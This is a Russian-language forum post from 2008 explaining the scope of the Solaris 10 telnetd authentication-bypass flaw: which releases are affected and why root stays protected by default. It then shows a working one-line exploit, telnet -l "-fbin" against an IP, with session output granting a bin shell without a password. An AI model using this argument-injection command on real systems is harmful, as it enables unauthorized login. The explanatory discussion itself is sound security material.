Показать сообщение отдельно

  #7  
Старый 18.04.2008, 22:11
n0rus
Новичок
Регистрация: 17.04.2008
Сообщений: 2
Провел на форуме:
41437

Репутация: 6
По умолчанию

Странно, что не упомянута бага в telnet-демоне.

1) Эта уязвимость относится лишь к некоторым релизам Solaris 10 (s10u1 и s10u2) и OpenSolaris/Nevada. Solaris 9 и более старые релизы Solaris не подвержены. Solaris 10 Update 3 так же неуязвим (потому, что по умолчанию в нём включён только демон SSH, и сервис telnet выключен в установке по умолчанию).

2) Эта уязвимость не позволит удалённого доступа root к Solaris-системе, установленной с настройками по умолчанию. Уязвимость не поможет получить доступ к системе с правами root, даже если на ней запущен демон in.telnetd, если только саморучно не закомментировали в своё время строчку в /etc/default/login:

Код:
CONSOLE=/dev/console
Данный пункт не относится ко многим другим системным пользователям, заведённым на системе. Пользуясь данной уязвимостью, можно будет без всяких паролей зайти на систему Solaris под такими аккаунтами, как bin, adm, sys или lp.

Код:
$ telnet -l "-fbin" 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1
Escape character is '^]'.
Last login: Sun Feb 11 12:04:55 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
$ uid=2(bin) gid=2(bin)